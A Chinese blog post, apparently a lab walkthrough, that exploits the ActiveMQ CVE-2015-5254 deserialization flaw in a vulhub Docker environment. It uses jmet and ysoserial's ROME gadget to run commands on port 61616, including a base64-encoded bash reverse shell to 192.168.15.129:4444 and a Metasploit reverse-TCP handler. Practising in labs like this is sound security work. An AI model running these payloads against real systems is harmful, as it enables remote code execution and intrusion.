vulhub搭建和玩耍

漏洞前言

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码,CVE-2015-5254。

环境搭建

vulnhub下载和安装
在这里插入图片描述

安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3
#安装最新版docker
curl -s https://get.docker.com/ | sh
#启动docker服务
service docker start
#安装compose
pip install docker-compose
#下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master
#进入某一个漏洞/环境的目录
cd activemq/CVE-2015-5254/
#自动化编译环境d
docker-compose up -d
访问本地8161端口在这里插入图片描述
默认密码登陆admin,admin。
在这里插入图片描述
1.漏洞利用过程如下:

a.构造(可以使用ysoserial)可执行命令的序列化对象

b.作为一个消息,发送给目标61616端口

c.访问的Web管理页面,读取消息,触发漏洞

2.使用jmet进行漏洞利用:

首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

mkdir CVE-2015-5254
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external

执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 45.32.101.90 61616

在这里插入图片描述
在这里插入图片描述
查看docker创建文件成功
在这里插入图片描述
不知道是环境问题,就是反弹不了shell。

bash -c {echo,payload进行base64编码}|{base64,-d}|{bash,-i}

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}” -Yp ROME 172.18.0.2 61616

后面使用msf
在这里插入图片描述
首先设置监听

use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页